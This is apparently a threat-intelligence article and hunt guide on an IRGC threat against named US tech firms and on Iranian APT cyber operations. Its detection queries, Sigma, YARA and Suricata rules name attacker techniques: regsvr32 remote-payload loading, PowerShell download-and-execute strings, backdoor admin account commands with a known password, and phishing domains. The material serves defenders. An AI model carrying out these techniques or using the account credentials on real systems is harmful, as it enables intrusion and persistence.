IRGC Names 18 US Tech Firms as Targets: A Kinetic and Cyber Threat Hits the Private Sector

Iran's Islamic Revolutionary Guard Corps has publicly named 18 major US corporations as targets for destruction, effective 8:00 PM Tehran time on April 1, 2026 [1]. The threat isn't theoretical. In early March 2026, AWS confirmed drone strikes damaged two of its facilities in the UAE and one in Bahrain, demonstrating Iran's willingness to target commercial infrastructure. Separately, Stryker confirmed a cyberattack on March 11, 2026, causing "global network disruption" to its Microsoft environment. This is the first time a state actor has issued a public, time-stamped targeting list against named private-sector companies, combining kinetic strike threats with coordinated cyber operations.

The IRGC statement, issued March 31, warned employees of the listed companies to evacuate their workplaces and instructed civilians to move at least one kilometer away from relevant facilities [1][2]. The language was explicit: "These companies, starting from 20:00 on Wednesday, April 1 (Tehran time), should expect the destruction of their relevant units in return for each assassination in Iran" [1].

The Target List

Foreign Policy published the list of 18 US corporations: Cisco, HP, Intel, Oracle, Microsoft, Apple, Google, Meta, IBM, Dell, Palantir, Nvidia, J.P. Morgan Chase, Tesla, GE, Spire Solution, and Boeing [2]. UAE-based G42, a major AI and cloud company, was also listed [2]. The IRGC's stated rationale ties these companies to US defense and intelligence contracts and their alleged role in "assassination targets designed by American ICT and AI companies" [1].

This is not a cyber-only threat. The inclusion of Boeing, Tesla, and GE signals that the IRGC views physical manufacturing and defense assets as valid targets alongside cloud and software infrastructure.

Targeted Facilities by Location in the Middle East

Several of these companies maintain significant physical and digital infrastructure across the Gulf region. Based on known corporate presence:

United Arab Emirates (UAE)

• Amazon Web Services: Operates data centers (separately targeted by drone strikes in March 2026)
• G42 (Abu Dhabi-based): Explicitly named on the IRGC target list [2]
• Microsoft, Google, Oracle, IBM, Dell, HP, Cisco, Palantir, Nvidia: All maintain regional headquarters, data centers, or major offices in Dubai or Abu Dhabi
• J.P. Morgan Chase: Regional banking operations in Dubai International Financial Centre
• Boeing: Maintenance and defense services operations in Abu Dhabi
• GE: Regional energy and aviation operations across the UAE
• Tesla: Showrooms and service centers in Dubai
• Spire Solution: UAE-based cybersecurity and IT firm [2]

Bahrain

• Amazon Web Services: Operates Middle East (Bahrain) region, its primary Gulf cloud availability zone

Broader Gulf Presence (Saudi Arabia, Qatar, Kuwait)

• Microsoft, Google, Oracle, IBM: Data centers and regional offices across Riyadh, Doha, and other Gulf capitals
• Intel, HP, Dell: Sales and engineering offices throughout the GCC
• Apple, Meta: Regional operations and content moderation centers

The concentration of US tech infrastructure in the UAE and Bahrain makes these countries the most immediate physical threat surface.

Attacks Already Underway

The Stryker cyberattack on March 11, 2026, claimed by the Handala Hack group, represents a significant cyber operation. Palo Alto Networks' Unit 42 identifies Handala as directly linked to Iran's Ministry of Intelligence and Security (MOIS) [4]. The group claimed their "major cyber operation has been executed with complete success" [5].

The US Department of Justice seized four Handala-controlled domains on March 19, 2026: handala-hack.to and handala-redwanted.to among them [5]. The group had used these domains to claim credit for the destructive malware attack against Stryker and to post personally identifiable information of approximately 190 Israeli Defense Force and government individuals [5]. Handala also sent death threats to Iranian dissidents from the email account Handala_Team@outlook.com [5].

Background: Iran's Cyber Apparatus

Iranian cyber operations are split between MOIS-linked groups (like Handala) and IRGC-affiliated actors (like APT35/Charming Kitten and APT42). These groups have a documented history stretching back to 2012 [4]. CISA's October 2024 advisory detailed how Iranian actors have used brute force attacks and MFA "push bombing" against healthcare, government, IT, engineering, and energy sector organizations since at least October 2023 [7]. A separate CISA advisory noted that Iranian actors sell compromised network access on cybercriminal forums and collaborate with ransomware affiliates [8].

APT42 has been documented using typo-squatted domains like washinqtonpost.press for credential harvesting operations targeting cloud environments [10].

Phishing at Scale

Unit 42 identified 7,381 phishing URLs spanning 1,881 unique hostnames in a conflict-themed campaign [4]. These URLs target critical infrastructure sectors and exploit the current geopolitical crisis as a lure. Domains like hyperfilevault1.xyz, iranforward.org, and trumpvsirancoin.xyz were used in scam campaigns requesting humanitarian aid donations [4].

Living Off the Land

Trellix's 2026 analysis of Iranian cyber capabilities found that threat actors prioritize living-off-the-land (LOTL) techniques using native system utilities [6]. PowerShell and cmd.exe serve as the "universal backbone for execution across nearly all groups" [6]. APT35 and Parisite weaponize LOLBins including Regsvr32, Mshta, and Rundll32 to evade detection [6].

Command and Control Evolution

Iranian C2 infrastructure has shifted to incorporate Telegram-based communications and blockchain-based domain generation algorithms [6]. This makes traditional domain blocking less effective.

Credential Harvesting and Initial Access

Microsoft previously disrupted 99 phishing domains used by Iranian actors, including outlook-verify.net, yahoo-verify.net, verification-live.com, and myaccount-services.net [12]. APT42 operates three distinct clusters of credential harvesting infrastructure, using generic login pages on domains like panel-live-check.online [10]. PHOSPHORUS (an APT35 subgroup) targeted Fortinet FortiOS SSL VPN and Exchange Servers globally, and was observed creating local administrator accounts with the username help and password _AS_@1394 [11].

Destructive Capabilities

Iranian actors have demonstrated willingness to deploy wiper malware and ransomware for destructive impact. PHOSPHORUS used BitLocker for ransomware deployment on compromised networks [11]. APT35 deploys custom implants including Magic Hound and PowerLess, a PowerShell backdoor [14]. Charming Kitten has exploited CVE-2012-1823 for remote code execution and deployed web shells for persistence [13].

IOC Table

MITRE ATT&CK Techniques

Detection and Hunting

Phishing Infrastructure: Block or alert on the domains listed in the IOC table. Hunt DNS logs for connections to .xyz TLD domains with conflict-related keywords. Query: index=dns (query=".xyz" OR query="verify" OR query="live-check*") and correlate with email gateway logs.

LOTL Detection: Monitor for anomalous PowerShell execution, especially encoded commands. Watch for Regsvr32, Mshta, and Rundll32 loading payloads from unusual paths. Sysmon Event ID 1 process creation logs are critical here. Flag any regsvr32.exe /s /n /u /i:<URL> patterns.

MFA Push Bombing: Alert on accounts receiving more than 5 MFA push notifications in a 10-minute window. Correlate with failed authentication attempts from IP ranges associated with VPN or proxy services. Query in Azure AD: SignInLogs | where ResultType == "50074" | summarize count() by UserPrincipalName, bin(TimeGenerated, 10m) | where count_ > 5.

Credential Harvesting: Monitor for login attempts using the specific credentials help / _AS_@1394 on any system [11]. Hunt for new local administrator account creation, particularly accounts named help.

C2 Communications: Monitor for Telegram API calls from servers that shouldn't be using Telegram. Watch for DNS queries to blockchain-based naming systems.

Physical Security: For organizations with Gulf-region facilities, coordinate with physical security teams on the IRGC's 1km evacuation warning [1][2].

Analysis

This is the first time the IRGC has issued a public, time-bound targeting list naming specific private-sector companies. The threat of kinetic strikes combined with ongoing cyber operations represents a significant escalation. Iran is treating US tech companies as legitimate military targets, explicitly linking them to US intelligence and defense operations.

The 18-company list is notable for its breadth. It includes cloud providers (Microsoft, Google, Oracle), semiconductor firms (Intel, Nvidia), defense contractors (Boeing, Palantir), financial institutions (J.P. Morgan Chase), and even automotive (Tesla). The inclusion of Spire Solution, a relatively small UAE-based firm, alongside Fortune 50 companies suggests the targeting criteria extend beyond size to perceived involvement in regional intelligence activities.

The DOJ's March 19 seizure of Handala domains [5] shows US law enforcement is actively disrupting Iranian cyber infrastructure, but the volume of operations (7,381 phishing URLs from a single campaign [4]) suggests the disruption is insufficient to degrade overall capability.

References

1. CNN. "Day 32 of Middle East conflict: Iran threatens US tech companies, Kuwaiti oil tanker attacked." https://www.cnn.com/2026/03/31/world/live-news/iran-war-us-trump-oil
2. Foreign Policy. "Iran Threatens U.S. Tech Companies After Hegseth Warns of Decisive Next Few Days." https://foreignpolicy.com/2026/03/31/iran-threat-us-tech-companies-irgc-hegseth-strait-hormuz-esfahan-oil-prices/
3. CBS News. "Iran says major U.S. tech firms are targets in the Middle East, with drone and cyberattacks already underway." https://www.cbsnews.com/news/iran-war-tehran-us-tech-companies-targets-middle-east-drones-cyberattacks/
4. Palo Alto Networks Unit 42. "Threat Brief: March 2026 Escalation of Cyber Risk Related to Iran." https://unit42.paloaltonetworks.com/iranian-cyberattacks-2026/
5. US Department of Justice. "Justice Department Disrupts Iranian Cyber Enabled Psychological Operations." https://www.justice.gov/opa/pr/justice-department-disrupts-iranian-cyber-enabled-psychological-operations
6. Trellix. "The Iranian Cyber Capability 2026." https://www.trellix.com/blogs/research/the-iranian-cyber-capability-2026/
7. CISA. "Iranian Cyber Actors' Brute Force and Credential Access Activity Compromises Critical Infrastructure Organizations." https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-290a
8. CISA. "Iran-based Cyber Actors Enabling Ransomware Attacks on US Organizations." https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a
9. Darktrace. "APT35 Charming Kitten Discovered in a Pre-Infected Environment." https://www.darktrace.com/blog/apt35-charming-kitten-discovered-in-a-pre-infected-environment
10. Google Cloud Blog. "Uncharmed: Untangling Iran's APT42 Operations." https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
11. Microsoft Security Blog. "Evolving trends in Iranian threat actor activity." https://www.microsoft.com/en-us/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/
12. Infosecurity Magazine. "Microsoft Claims 'Significant' Disruption of Iranian APT Group." https://www.infosecurity-magazine.com/news/microsoft-significant-disruption-1/
13. Gatewatcher. "Data breach: the operations of Charming Kitten revealed." https://www.gatewatcher.com/en/lab/data-breach-the-operations-of-charming-kitten-revealed/
14. Cyber Defence. "Charming Kitten (APT35)." https://www.cyber-defence.io/blog/charming-kitten-apt35

Hunt Guide: Hunt Report: IRGC/MOIS Multi-Vector Campaign Against US Tech Sector

Hypothesis: If Iranian state actors (IRGC/MOIS affiliates including Handala, APT35, APT42) are active in our environment, we expect to observe PowerShell-based LOTL techniques, MFA push bombing, phishing infrastructure connections, and specific account creation patterns in Windows Security, Sysmon, authentication logs, and DNS data.

Intelligence Summary: Iran's IRGC has publicly named 18 major US tech companies for kinetic and cyber destruction effective April 1, 2026, with attacks already underway including confirmed drone strikes on AWS facilities and a destructive Handala/MOIS cyberattack on Stryker. The campaign combines physical targeting threats with sophisticated cyber operations using PowerShell implants, credential harvesting, and destructive malware.

Confidence: High | Priority: Critical

Scope

• Networks: All corporate networks with focus on external-facing services, Exchange servers, VPN gateways, and systems with access to Gulf region infrastructure
• Timeframe: Last 90 days with emphasis on March 2026 forward due to campaign timeline
• Priority Systems: Exchange servers, Fortinet VPN appliances, domain controllers, systems with PowerShell remoting enabled, web servers (IIS/Apache), any infrastructure in UAE/Bahrain/Saudi Arabia/Qatar

MITRE ATT&CK Techniques

T1059.001 — PowerShell (Execution) [P2]

Iranian actors use PowerShell as the universal backbone for execution, deploying custom backdoors like PowerLess and encoded commands

Splunk SPL:

index=* (source=WinEventLog:Microsoft-Windows-PowerShell/Operational OR source=WinEventLog:Security) (EventCode=4104 OR EventCode=4688 OR EventCode=1) (CommandLine="*-enc*" OR CommandLine="*-EncodedCommand*" OR CommandLine="*IEX*" OR CommandLine="*Invoke-Expression*" OR CommandLine="*downloadstring*" OR ScriptBlockText="*WebClient*" OR ScriptBlockText="*DownloadFile*") | stats count by Computer, User, CommandLine, ScriptBlockText | where count > 5

Elastic KQL:

(event.code:("4104" OR "4688" OR "1") AND (process.command_line:(*\-enc* OR *\-EncodedCommand* OR *IEX* OR *Invoke\-Expression* OR *downloadstring*) OR powershell.script_block_text:(*WebClient* OR *DownloadFile*))) AND (event.provider:("Microsoft-Windows-PowerShell" OR "Microsoft-Windows-Security-Auditing" OR "Microsoft-Windows-Sysmon"))

Sigma Rule:

title: Iranian APT PowerShell Execution Patterns
id: a8f9c2e3-7b5d-4f8e-9c1a-2d3e4f5a6b7c
status: production
description: Detects PowerShell execution patterns used by Iranian APT groups
references:
  - Internal TH Report
author: Threat Hunt Team
date: 2024/01/01
modified: 2024/01/01
tags:
  - attack.execution
  - attack.t1059.001
logsource:
  product: windows
  service: powershell
  definition: ScriptBlock logging must be enabled
detection:
  selection:
    EventID:
      - 4104
      - 4688
      - 1
    CommandLine|contains:
      - '-enc'
      - '-EncodedCommand'
      - 'IEX'
      - 'Invoke-Expression'
      - 'downloadstring'
    ScriptBlockText|contains:
      - 'WebClient'
      - 'DownloadFile'
      - 'Net.WebRequest'
  condition: selection
falsepositives:
  - Legitimate admin scripts
  - Software deployment tools
level: high

Monitor for base64 encoded commands and web downloads. Baseline legitimate PowerShell usage in your environment first.

T1136.001 — Local Account (Persistence) [P1]

PHOSPHORUS creates local administrator accounts with username 'help' and password '_AS_@1394'

Splunk SPL:

index=* source=WinEventLog:Security (EventCode=4720 OR EventCode=4722 OR EventCode=4732) (TargetUserName="help" OR SamAccountName="help" OR MemberName="help") | table _time, Computer, EventCode, TargetUserName, SubjectUserName, MemberName

Elastic KQL:

(event.code:("4720" OR "4722" OR "4732") AND (winlog.event_data.TargetUserName:"help" OR winlog.event_data.SamAccountName:"help" OR winlog.event_data.MemberName:"help"))

Sigma Rule:

title: Iranian APT Local Admin Account Creation
id: b9f8d2e1-6a3c-4e7f-8d1a-9c2b3f4e5d6a
status: production
description: Detects creation of local admin account 'help' used by PHOSPHORUS
references:
  - Internal TH Report
author: Threat Hunt Team
date: 2024/01/01
modified: 2024/01/01
tags:
  - attack.persistence
  - attack.t1136.001
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID:
      - 4720
      - 4722
      - 4732
    TargetUserName: 'help'
  condition: selection
falsepositives:
  - Legitimate help desk account creation
level: critical

This is a known IOC - any detection should be treated as confirmed compromise. Also check for password '_AS_@1394' in authentication logs.

T1110.003 — Password Spraying (Credential Access) [P2]

Iranian actors conduct MFA push bombing attacks against critical infrastructure

Splunk SPL:

index=* sourcetype=azure:aad:signin (ResultType=50074 OR ResultType=50076 OR ResultType=50079) | bucket _time span=10m | stats count by _time, UserPrincipalName, IPAddress | where count > 5 | rename UserPrincipalName as user

Elastic KQL:

(azure.signinlogs.result_type:("50074" OR "50076" OR "50079") OR event.code:"4625") | stats count by user.name, source.ip, date_histogram(field=@timestamp, interval=10m) | where count > 5

Configure alerts for >5 MFA prompts in 10 minutes. Monitor for push notifications outside business hours.

T1566.002 — Spearphishing Link (Initial Access) [P1]

7,381 phishing URLs identified targeting critical infrastructure with conflict-themed lures

Splunk SPL:

index=* (sourcetype=dns OR sourcetype=proxy) (query="*.xyz" OR url="*.xyz" OR query="*verify*.net" OR url="*verify*.net" OR query="*verify*.com" OR url="*verify*.com" OR query="*live-check*" OR url="*live-check*" OR query="washinqtonpost.press" OR url="washinqtonpost.press") | stats count by src_ip, user, query, url | where count > 1

Elastic KQL:

(dns.question.name:(*.xyz OR *verify*.net OR *verify*.com OR *live\-check* OR washinqtonpost.press) OR url.domain:(*.xyz OR *verify*.net OR *verify*.com OR *live\-check* OR washinqtonpost.press))

Focus on .xyz TLD and typosquatted domains. Check email gateway for these domains in message bodies.

T1218.010 — Regsvr32 (Defense Evasion) [P2]

APT35/Parisite use Regsvr32 for LOTL execution and DLL proxy loading

Splunk SPL:

index=* (source=WinEventLog:Microsoft-Windows-Sysmon/Operational EventCode=1 OR source=WinEventLog:Security EventCode=4688) Image="*\\regsvr32.exe" (CommandLine="*/s*" AND CommandLine="*/n*" AND CommandLine="*/u*" AND CommandLine="*/i:*") AND (CommandLine="*http*" OR CommandLine="*ftp*" OR CommandLine="*file://*") | table _time, Computer, User, CommandLine, ParentCommandLine

Elastic KQL:

(event.code:("1" OR "4688") AND process.name:"regsvr32.exe" AND process.command_line:(*\/s* AND *\/n* AND *\/u* AND *\/i\:*) AND process.command_line:(*http* OR *ftp* OR *file\:\/\/**))

Focus on regsvr32 loading remote payloads via /i: parameter. Check parent process for anomalies.

T1505.003 — Web Shell (Persistence) [P1]

Iranian actors deploy web shells on compromised Exchange and web servers

Splunk SPL:

index=* (sourcetype=iis OR sourcetype=WinEventLog:Microsoft-Windows-Sysmon/Operational) (EventCode=11 OR cs_uri_stem="*.aspx" OR cs_uri_stem="*.ashx" OR cs_uri_stem="*.asmx") (TargetFilename="*\\inetpub\\wwwroot\\*" OR TargetFilename="*\\Exchange\\*" OR TargetFilename="*\\OWA\\*") (TargetFilename="*.aspx" OR TargetFilename="*.ashx" OR TargetFilename="*.asmx") | dedup TargetFilename | table _time, Computer, TargetFilename, User

Elastic KQL:

(event.code:"11" AND file.path:(*\\inetpub\\wwwroot\\* OR *\\Exchange\\* OR *\\OWA\\*) AND file.name:(*.aspx OR *.ashx OR *.asmx))

Review any new ASPX/ASHX files in web directories. Check for files with suspicious names or recent creation dates.

T1190 — Exploit Public-Facing Application (Initial Access) [P1]

PHOSPHORUS targets Fortinet FortiOS SSL VPN and Exchange Servers globally

Splunk SPL:

index=* (sourcetype=fortinet OR sourcetype=MSExchange*) ("CVE-2018-13379" OR "CVE-2021-26855" OR "ProxyShell" OR "ProxyLogon" OR "/+CSCOE+/" OR "/remote/login" OR "ECP/DDI") | stats count by src_ip, dest_port, uri_path | where count > 10

Elastic KQL:

(event.dataset:(fortinet OR exchange) AND (vulnerability.id:("CVE-2018-13379" OR "CVE-2021-26855") OR url.path:("/+CSCOE+/" OR "/remote/login" OR "ECP/DDI")))

Patch Fortinet and Exchange immediately. Monitor for exploitation attempts even if patched.

T1486 — Data Encrypted for Impact (Impact) [P1]

PHOSPHORUS deploys BitLocker for ransomware on compromised networks

Splunk SPL:

index=* (source=WinEventLog:Security EventCode=4663 OR source=WinEventLog:Microsoft-Windows-Sysmon/Operational EventCode=1) (ProcessName="*\\manage-bde.exe" OR CommandLine="*manage-bde*" OR CommandLine="*-protectors -add*" OR CommandLine="*-protectors -delete*" OR CommandLine="*BitLocker*") | table _time, Computer, User, CommandLine, ObjectName

Elastic KQL:

(event.code:("4663" OR "1") AND (process.name:"manage-bde.exe" OR process.command_line:(*manage\-bde* OR *\-protectors* OR *BitLocker*)))

Alert on any unexpected BitLocker operations, especially deletion of recovery keys or forced encryption.

T1071.001 — Web Protocols (Command and Control) [P2]

Iranian C2 uses Telegram API and blockchain-based domain generation

Splunk SPL:

index=* (sourcetype=dns OR sourcetype=proxy OR sourcetype=firewall) (query="*api.telegram.org*" OR url="*api.telegram.org*" OR query="*.bit" OR query="*.eth" OR query="*.crypto" OR url="*.bit" OR url="*.eth" OR url="*.crypto") NOT user="telegram_bot_service" | stats count by src_ip, dest_ip, query, url | where count > 5

Elastic KQL:

(dns.question.name:(*api.telegram.org* OR *.bit OR *.eth OR *.crypto) OR url.domain:(*api.telegram.org* OR *.bit OR *.eth OR *.crypto)) AND NOT user.name:"telegram_bot_service"

Baseline legitimate Telegram usage. Alert on blockchain DNS queries from servers.

Indicators of Compromise

IOC Sweep Queries (Splunk):

index=* (sourcetype=dns OR sourcetype=proxy OR sourcetype=firewall) (query="handala-hack.to" OR url="*handala-hack.to*" OR dest="handala-hack.to") | table _time, src_ip, user, query, url

index=* (sourcetype=dns OR sourcetype=proxy OR sourcetype=firewall) (query="handala-redwanted.to" OR url="*handala-redwanted.to*" OR dest="handala-redwanted.to") | table _time, src_ip, user, query, url

index=* (sourcetype=dns OR sourcetype=proxy OR sourcetype=firewall) (query="justicehomeland.org" OR url="*justicehomeland.org*" OR dest="justicehomeland.org") | table _time, src_ip, user, query, url

index=* (sourcetype=dns OR sourcetype=proxy OR sourcetype=firewall) (query="karmabelow80.org" OR url="*karmabelow80.org*" OR dest="karmabelow80.org") | table _time, src_ip, user, query, url

index=* (sourcetype=dns OR sourcetype=proxy OR sourcetype=firewall) (query="hyperfilevault1.xyz" OR url="*hyperfilevault1.xyz*" OR dest="hyperfilevault1.xyz") | table _time, src_ip, user, query, url

index=* (sourcetype=dns OR sourcetype=proxy OR sourcetype=firewall) (query="iranforward.org" OR url="*iranforward.org*" OR dest="iranforward.org") | table _time, src_ip, user, query, url

index=* (sourcetype=dns OR sourcetype=proxy OR sourcetype=firewall) (query="trumpvsirancoin.xyz" OR url="*trumpvsirancoin.xyz*" OR dest="trumpvsirancoin.xyz") | table _time, src_ip, user, query, url

index=* (sourcetype=dns OR sourcetype=proxy OR sourcetype=firewall) (query="washinqtonpost.press" OR url="*washinqtonpost.press*" OR dest="washinqtonpost.press") | table _time, src_ip, user, query, url

index=* (sourcetype=dns OR sourcetype=proxy OR sourcetype=firewall) (query="panel-live-check.online" OR url="*panel-live-check.online*" OR dest="panel-live-check.online") | table _time, src_ip, user, query, url

index=* (sourcetype=dns OR sourcetype=proxy OR sourcetype=firewall) (query="outlook-verify.net" OR url="*outlook-verify.net*" OR dest="outlook-verify.net") | table _time, src_ip, user, query, url

index=* (sourcetype=dns OR sourcetype=proxy OR sourcetype=firewall) (query="yahoo-verify.net" OR url="*yahoo-verify.net*" OR dest="yahoo-verify.net") | table _time, src_ip, user, query, url

index=* (sourcetype=dns OR sourcetype=proxy OR sourcetype=firewall) (query="verification-live.com" OR url="*verification-live.com*" OR dest="verification-live.com") | table _time, src_ip, user, query, url

index=* (sourcetype=dns OR sourcetype=proxy OR sourcetype=firewall) (query="myaccount-services.net" OR url="*myaccount-services.net*" OR dest="myaccount-services.net") | table _time, src_ip, user, query, url

index=* (sourcetype=email OR sourcetype=msgtrack) (sender="Handala_Team@outlook.com" OR from="Handala_Team@outlook.com" OR recipient="Handala_Team@outlook.com" OR to="Handala_Team@outlook.com") | table _time, sender, recipient, subject

index=* (sourcetype=WinEventLog:Microsoft-Windows-Sysmon/Operational EventCode=1 OR sourcetype=WinEventLog:Security EventCode=4688) (CommandLine="*PowerLess*" OR Image="*PowerLess*" OR OriginalFileName="*PowerLess*") | table _time, Computer, User, CommandLine, Image

index=* (sourcetype=WinEventLog:Microsoft-Windows-Sysmon/Operational EventCode=1 OR sourcetype=WinEventLog:Security EventCode=4688) (CommandLine="*Magic Hound*" OR CommandLine="*MagicHound*" OR Image="*MagicHound*") | table _time, Computer, User, CommandLine, Image

YARA Rules

APT35_PowerLess_Backdoor — Detects PowerLess PowerShell backdoor used by APT35/Magic Hound

rule APT35_PowerLess_Backdoor {
    meta:
        description = "Detects PowerLess PowerShell backdoor used by APT35"
        author = "Threat Hunt Team"
        date = "2024-01-01"
        reference = "Iranian APT Campaign"
    strings:
        $ps1 = "PowerLess" ascii wide nocase
        $ps2 = "Invoke-Expression" ascii wide
        $ps3 = "DownloadString" ascii wide
        $ps4 = "System.Net.WebClient" ascii wide
        $ps5 = "FromBase64String" ascii wide
        $cmd1 = "-EncodedCommand" ascii wide
        $cmd2 = "-enc " ascii wide
        $magic1 = "Magic Hound" ascii wide nocase
        $magic2 = "MagicHound" ascii wide nocase
    condition:
        (($ps1 or $magic1 or $magic2) and any of ($ps2,$ps3,$ps4,$ps5)) or
        (2 of ($ps2,$ps3,$ps4,$ps5) and any of ($cmd1,$cmd2))
}

PHOSPHORUS_Persistence_Indicators — Detects PHOSPHORUS/APT35 persistence mechanisms including specific account names

rule PHOSPHORUS_Persistence_Indicators {
    meta:
        description = "Detects PHOSPHORUS persistence including help account"
        author = "Threat Hunt Team"
        date = "2024-01-01"
        reference = "PHOSPHORUS Creates Local Admin"
    strings:
        $user1 = "help" ascii wide
        $pass1 = "_AS_@1394" ascii wide
        $cmd1 = "net user help" ascii wide
        $cmd2 = "net localgroup administrators help" ascii wide
        $reg1 = "HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\help" ascii wide nocase
    condition:
        ($user1 and $pass1) or
        any of ($cmd1,$cmd2) or
        $reg1
}

Suricata Rules

SID 1000001 — Detects DNS queries to Handala MOIS infrastructure

alert dns any any -> any 53 (msg:"ET TROJAN Handala MOIS DNS Query Detected"; dns.query; content:"handala-hack.to"; nocase; endswith; sid:1000001; rev:1;)

SID 1000002 — Detects DNS queries to APT42 credential harvesting domains

alert dns any any -> any 53 (msg:"ET TROJAN APT42 Credential Harvesting Domain"; dns.query; content:"panel-live-check.online"; nocase; endswith; sid:1000002; rev:1;)

SID 1000003 — Detects HTTP traffic to Iranian phishing domains

alert http any any -> any any (msg:"ET TROJAN Iranian APT Phishing Domain in HTTP"; flow:established,to_server; http.host; content:"outlook-verify.net"; nocase; sid:1000003; rev:1;)

SID 1000004 — Detects Telegram C2 communication patterns

alert tls any any -> any 443 (msg:"ET TROJAN Possible Iranian APT Telegram C2"; tls.sni; content:"api.telegram.org"; flow:established,to_server; threshold: type limit, track by_src, seconds 300, count 1; sid:1000004; rev:1;)

Data Source Requirements

Sources

• CNN - Day 32 of Middle East conflict: Iran threatens US tech companies
• Foreign Policy - Iran Threatens U.S. Tech Companies After Hegseth Warns
• CBS News - Iran says major U.S. tech firms are targets
• Palo Alto Networks Unit 42 - Threat Brief: March 2026 Escalation
• DOJ - Justice Department Disrupts Iranian Cyber Operations
• Trellix - The Iranian Cyber Capability 2026
• CISA - Iranian Actors Brute Force Activity AA24-290A
• CISA - Iran-based Actors Enabling Ransomware AA24-241A
• Darktrace - APT35 Charming Kitten Pre-Infected Environment
• Google Cloud - Uncharmed: Untangling Iran's APT42
• Microsoft - Evolving trends in Iranian threat actor activity
• Infosecurity - Microsoft Disruption of Iranian APT
• Gatewatcher - Charming Kitten Operations Revealed
• Cyber Defence - Charming Kitten APT35